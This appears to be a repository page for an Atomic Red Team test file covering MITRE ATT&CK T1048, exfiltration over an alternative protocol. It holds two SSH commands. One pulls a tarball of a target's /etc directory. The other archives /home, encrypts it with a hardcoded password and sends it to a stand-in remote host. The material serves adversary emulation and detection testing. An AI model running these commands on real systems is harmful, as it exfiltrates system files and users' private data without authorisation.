Files
atomic-red-team/Linux/Exfiltration/Exfiltration_Over_Alternative_Protocol.md
T
2018-02-08 06:52:43 -06:00

351 B

Exfiltration Over Alternative Protocol

MITRE ATT&CK Technique: T1048

SSH

Remote to Local:

ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

Local to Remote:

tar czpf - /home/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /home.tar.gz.enc'